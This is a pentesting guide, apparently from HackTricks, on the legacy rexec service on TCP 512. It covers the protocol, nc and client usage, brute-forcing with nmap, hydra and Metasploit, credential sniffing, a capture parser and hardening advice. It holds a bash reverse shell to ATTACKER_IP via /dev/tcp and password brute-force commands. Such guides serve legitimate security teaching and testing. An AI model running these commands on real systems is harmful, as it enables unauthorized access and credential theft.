hacktricks/src/network-services-pentesting/512-pentesting-rexec.md
2025-07-15 12:46:09 +02:00


# 512 - Pentesting Rexec
{{#include ../banners/hacktricks-training.md}}
## Basic Information
Rexec (remote **exec**) is one of the original Berkeley *r*-services suite (together with `rlogin`, `rsh`, …). It provides a **remote command-execution** capability **authenticated only with a clear-text username and password**. The protocol was defined in the early 1980s (see RFC 1060) and is nowadays considered **insecure by design**. Nevertheless it is still enabled by default in some legacy UNIX / network-attached equipment and occasionally shows up during internal pentests.
**Default Port:** TCP 512 (`exec`)
```
PORT STATE SERVICE
512/tcp open exec
```
> 🔥 All traffic including credentials is transmitted **unencrypted**. Anyone with the ability to sniff the network can recover the username, password and command.
### Protocol quick-look
1. Client connects to TCP 512.
2. Client sends three **NUL-terminated** strings:
   * the port number (as ASCII) where it wishes to receive stdout/stderr (often `0`),
   * the **username**,
   * the **password**.
3. A final NUL-terminated string with the **command** to execute is sent.
4. The server replies with a single 8-bit status byte (`0` = success, `1` = failure) followed by the command output.
That means you can reproduce the exchange with nothing more than `echo -ne` and `nc`:
```bash
(echo -ne "0\0user\0password\0id\0"; cat) | nc <target> 512
```
If the credentials are valid you will receive the output of `id` straight back on the same connection.
### Manual usage with the client
Many Linux distributions still ship the legacy client inside the **inetutils-rexec** / **rsh-client** package:
```bash
rexec -l user -p password <target> "uname -a"
```
If `-p` is omitted the client will prompt interactively for the password (visible on the wire in clear-text!).
---
## Enumeration & Brute-forcing
### [**Brute-force**](../generic-hacking/brute-force.md#rexec)
### Nmap
```bash
# Discover service banner and test for stdout port mis-configuration
nmap -p 512 --script rexec-info <target>
# Try credential pairs using the protocol-aware NSE script
nmap -p 512 --script rexec-brute --script-args "userdb=users.txt,passdb=rockyou.txt" <target>
```
The `rexec-brute` NSE script uses the protocol described above to try credentials very quickly.
### Hydra / Medusa / Ncrack
```bash
hydra -L users.txt -P passwords.txt rexec://<target> -s 512 -t 8
```
`hydra` has a dedicated **rexec** module and remains the fastest offline brute-forcer. `medusa` (`-M REXEC`) and `ncrack` (`rexec` module) can be used in the same way.
### Metasploit
```
use auxiliary/scanner/rservices/rexec_login
set RHOSTS <target>
set USER_FILE users.txt
set PASS_FILE passwords.txt
run
```
The module will spawn a shell on success and store the credentials in the database.
---
## Sniffing credentials
Because everything is clear-text, **network captures are priceless**. With a copy of the traffic you can extract creds without touching the target:
```bash
tshark -r traffic.pcap -Y 'tcp.port == 512' -T fields -e data.decoded | \
    awk -F"\\0" '{print $2":"$3" -> "$4}'   # username:password -> command
```
(In Wireshark use *Decode As...* to map TCP 512 to REXEC and view the parsed fields.)
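The request and reply format from the protocol quick-look, together with the credential extraction the `tshark` pipeline performs, as an added Python example that is not part of the original page: it encodes a request, decodes a captured one (returning `None` for incomplete or malformed data, which the awk one-liner silently mangles), and produces a summary line for a detection note with the password redacted. The sample payload is constructed for this example.

```python
# Added example (not part of the original page): encode/decode the rexec
# exchange described above so an analyst can confirm what a capture exposed.
# The sample payload below is constructed for this example.

def build_rexec_request(stderr_port, username, password, command):
    """Encode a client request as the four NUL-terminated strings."""
    fields = (str(stderr_port), username, password, command)
    if any("\0" in f for f in fields):
        raise ValueError("rexec fields cannot contain NUL")
    return "".join(f + "\0" for f in fields).encode()

def parse_rexec_request(payload):
    """Decode the client's data sent to TCP 512.

    Returns a dict with the four fields, or None when the payload is not a
    complete request (fewer than four NUL-terminated strings, or a port that
    is not numeric).
    """
    parts = payload.split(b"\0")
    if len(parts) < 5:  # four terminated fields leave a 5th (maybe empty) remainder
        return None
    port_s, user, pw, cmd = (p.decode("latin-1") for p in parts[:4])
    if not port_s.isdigit():
        return None
    # A non-zero port means the server will open a second TCP connection
    # back to the client for the secondary stream; zero means "not used".
    return {"stderr_port": int(port_s), "username": user,
            "password": pw, "command": cmd}

def parse_rexec_response(data):
    """Server reply: one status byte (0 = success, 1 = failure), then output."""
    if not data:
        return None
    return {"ok": data[0] == 0, "status": data[0],
            "body": data[1:].decode("latin-1", errors="replace")}

def summarize_capture(payload):
    """'user:<redacted> -> command', the defender-side form of the awk one-liner."""
    req = parse_rexec_request(payload)
    if req is None:
        return None
    return f"{req['username']}:<redacted> -> {req['command']}"

# Constructed sample: what the echo/nc one-liner above puts on the wire.
SAMPLE_CAPTURE = b"0\0user\0password\0id\0"

if __name__ == "__main__":
    print(parse_rexec_request(SAMPLE_CAPTURE))
    print(summarize_capture(SAMPLE_CAPTURE))
    print(parse_rexec_response(b"\x00uid=1000(user) gid=1000(user)\n"))
```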
---
## Post-Exploitation tips
* Commands run with the privileges of the supplied user. If `/etc/pam.d/rexec` is mis-configured (e.g. `pam_rootok`), root shells are sometimes possible.
* Rexec ignores the user's shell and executes the command via `/bin/sh -c <cmd>`. You can therefore use typical shell-escape tricks (`;`, `$( )`, backticks) to chain multiple commands or spawn reverse shells:
```bash
rexec -l user -p pass <target> 'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"'
```
* Passwords are often stored in **~/.netrc** on other systems; if you compromise one host you may reuse them for lateral movement.
---
## Hardening / Detection
* **Do not expose rexec**; replace it with SSH. Virtually all modern *inetd* superservers comment the service out by default.
* If you must keep it, restrict access with TCP wrappers (`/etc/hosts.allow`) or firewall rules and enforce strong per-account passwords.
* Monitor for traffic to :512 and for `rexecd` process launches. A single packet capture is enough to detect a compromise.
* Disable `rexec`, `rlogin` and `rsh` together; they share most of the same code base and weaknesses.
---
## References
* Nmap NSE `rexec-brute` documentation [https://nmap.org/nsedoc/scripts/rexec-brute.html](https://nmap.org/nsedoc/scripts/rexec-brute.html)
* Rapid7 Metasploit module `auxiliary/scanner/rservices/rexec_login` [https://www.rapid7.com/db/modules/auxiliary/scanner/rservices/rexec_login](https://www.rapid7.com/db/modules/auxiliary/scanner/rservices/rexec_login)
{{#include ../banners/hacktricks-training.md}}